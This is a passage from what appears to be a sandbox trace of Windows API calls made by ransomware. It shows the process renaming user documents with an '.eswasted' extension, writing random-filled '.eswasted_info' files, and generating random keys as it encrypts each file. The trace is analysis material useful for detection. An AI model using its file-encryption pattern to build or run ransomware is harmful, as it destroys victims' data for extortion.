HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\ZMpMHpVtC4 chO8TI\\OLgjUQnqccd626W.pdf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\zmpmhpvtc4 cho8ti\\olgjuqnqccd626w.pdf.eswasted")) returned 1 [0075.776] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\ZMpMHpVtC4 chO8TI\\OLgjUQnqccd626W.pdf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\zmpmhpvtc4 cho8ti\\olgjuqnqccd626w.pdf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0075.776] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0075.777] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0075.778] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0075.778] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.778] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0075.779] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0075.779] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.788] SetEndOfFile (hFile=0x124) returned 1 [0075.790] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.790] CloseHandle (hObject=0x124) returned 1 [0075.792] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0075.793] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0075.793] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0075.793] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.793] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DALhTdxu9nC.xlsx") returned 60 [0075.793] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x282) returned 0x71aba0 [0075.793] lstrcpyW (in: lpString1=0x71ac18, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.793] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71c050 [0075.794] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0075.794] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71c050 | out: pbBuffer=0x71c050) returned 1 [0075.794] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.794] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DALhTdxu9nC.xlsx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dalhtdxu9nc.xlsx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0075.795] WriteFile (in: hFile=0x124, lpBuffer=0x71c050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x71c050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0075.796] SetEndOfFile (hFile=0x124) returned 1 [0075.796] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.796] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.796] lstrcpyW (in: lpString1=0x71ac18, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.796] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DALhTdxu9nC.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dalhtdxu9nc.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DALhTdxu9nC.xlsx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dalhtdxu9nc.xlsx.eswasted")) returned 1 [0075.797] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DALhTdxu9nC.xlsx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dalhtdxu9nc.xlsx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0075.797] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0075.799] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0075.800] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0075.800] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.800] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0075.801] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0075.801] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.809] SetEndOfFile (hFile=0x124) returned 1 [0075.811] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.811] CloseHandle (hObject=0x124) returned 1 [0075.815] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71aba0 | out: hHeap=0x6d0000) returned 1 [0075.815] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0075.816] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0075.816] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.816] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Dzsbxuif5Wbc.pptx") returned 61 [0075.816] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x284) returned 0x71aba0 [0075.816] lstrcpyW (in: lpString1=0x71ac1a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.816] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71c050 [0075.816] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0075.817] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71c050 | out: pbBuffer=0x71c050) returned 1 [0075.817] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.817] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Dzsbxuif5Wbc.pptx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dzsbxuif5wbc.pptx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0075.867] WriteFile (in: hFile=0x11c, lpBuffer=0x71c050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x71c050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0075.868] SetEndOfFile (hFile=0x11c) returned 1 [0075.869] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.869] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.869] lstrcpyW (in: lpString1=0x71ac1a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.869] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Dzsbxuif5Wbc.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dzsbxuif5wbc.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Dzsbxuif5Wbc.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dzsbxuif5wbc.pptx.eswasted")) returned 1 [0075.869] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Dzsbxuif5Wbc.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dzsbxuif5wbc.pptx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0075.870] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0075.871] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f0e0) returned 1 [0075.872] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0075.872] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0075.872] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f0e0) returned 1 [0075.873] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0075.873] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0075.881] SetEndOfFile (hFile=0x11c) returned 1 [0075.884] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.884] CloseHandle (hObject=0x11c) returned 1 [0075.885] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71aba0 | out: hHeap=0x6d0000) returned 1 [0075.886] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f0e0) returned 1 [0075.886] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0075.886] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0075.886] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GWaH\\V7jJ.pptx") returned 58 [0075.886] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27e) returned 0x719d90 [0075.887] lstrcpyW (in: lpString1=0x719e04, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.887] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71a288 [0075.887] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f0e0) returned 1 [0075.887] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0xa46, pbBuffer=0x71a288 | out: pbBuffer=0x71a288) returned 1 [0075.887] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0075.887] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GWaH\\V7jJ.pptx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gwah\\v7jj.pptx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0075.947] WriteFile (in: hFile=0x124, lpBuffer=0x71a288*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x71a288*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0075.948] SetEndOfFile (hFile=0x124) returned 1 [0075.948] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.948] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0075.948] lstrcpyW (in: lpString1=0x719e04, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.948] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GWaH\\V7jJ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gwah\\v7jj.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GWaH\\V7jJ.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gwah\\v7jj.pptx.eswasted")) returned 1 [0075.949] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GWaH\\V7jJ.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gwah\\v7jj.pptx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0075.949] CreateFileMappingW (hFile=0x134, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0075.952] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0075.953] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0075.953] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.953] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0075.953] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0075.953] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.997] SetEndOfFile (hFile=0x124) returned 1 [0075.999] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0075.999] CloseHandle (hObject=0x124) returned 1 [0076.000] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719d90 | out: hHeap=0x6d0000) returned 1 [0076.001] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0076.001] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0076.001] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.001] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ggmDD6kRAmVW.pdf") returned 68 [0076.001] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x292) returned 0x71ec18 [0076.002] lstrcpyW (in: lpString1=0x71eca0, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.002] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71a288 [0076.002] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0076.002] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71a288 | out: pbBuffer=0x71a288) returned 1 [0076.002] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.002] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ggmDD6kRAmVW.pdf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ggmdd6kramvw.pdf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0076.003] WriteFile (in: hFile=0x124, lpBuffer=0x71a288*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x71a288*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0076.004] SetEndOfFile (hFile=0x124) returned 1 [0076.004] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.004] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0076.004] lstrcpyW (in: lpString1=0x71eca0, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.005] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ggmDD6kRAmVW.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ggmdd6kramvw.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ggmDD6kRAmVW.pdf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ggmdd6kramvw.pdf.eswasted")) returned 1 [0076.005] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ggmDD6kRAmVW.pdf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ggmdd6kramvw.pdf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0076.006] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0076.009] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0076.010] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0076.010] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.010] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0076.011] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0076.011] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.022] SetEndOfFile (hFile=0x124) returned 1 [0076.046] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0076.047] CloseHandle (hObject=0x124) returned 1 [0076.049] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0076.049] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0076.050] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0076.050] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.050] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\-O4-7ZIzYB1H.pdf") returned 88 [0076.050] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2ba) returned 0x71ec18 [0076.050] lstrcpyW (in: lpString1=0x71ecc8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.050] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71a288 [0076.050] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0076.051] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71a288 | out: pbBuffer=0x71a288) returned 1 [0076.051] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\-O4-7ZIzYB1H.pdf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ieo365uuaq2enmaxgyb\\-o4-7zizyb1h.pdf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0076.052] WriteFile (in: hFile=0x124, lpBuffer=0x71a288*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x71a288*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0076.053] SetEndOfFile (hFile=0x124) returned 1 [0076.053] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.053] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0076.054] lstrcpyW (in: lpString1=0x71ecc8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.054] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\-O4-7ZIzYB1H.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ieo365uuaq2enmaxgyb\\-o4-7zizyb1h.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\-O4-7ZIzYB1H.pdf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ieo365uuaq2enmaxgyb\\-o4-7zizyb1h.pdf.eswasted")) returned 1 [0076.086] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\-O4-7ZIzYB1H.pdf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nhqd6bz\\ieo365uuaq2enmaxgyb\\-o4-7zizyb1h.pdf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0076.086] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0076.089] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0076.090] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0076.090] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.090] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0076.091] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0076.091] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.104] SetEndOfFile (hFile=0x124) returned 1 [0076.107] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0076.107] CloseHandle (hObject=0x124) returned 1 [0076.111] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0076.111] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0076.112] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0076.112] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.112] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\l3On-KdN.ppt") returned 84 [0076.112] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2b2) returned 0x6f5cc0 [0076.113] lstrcpyW (in: lpString1=0x6f5d68, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.113] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71c050 [0076.113] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0076.114] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71c050 | out: pbBuffer=0x71c050) returned 1 [0076.114] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0076.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NHqD6Bz\\ieo365UUaQ2eNMAxgYb\\l3On-KdN.ppt.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js 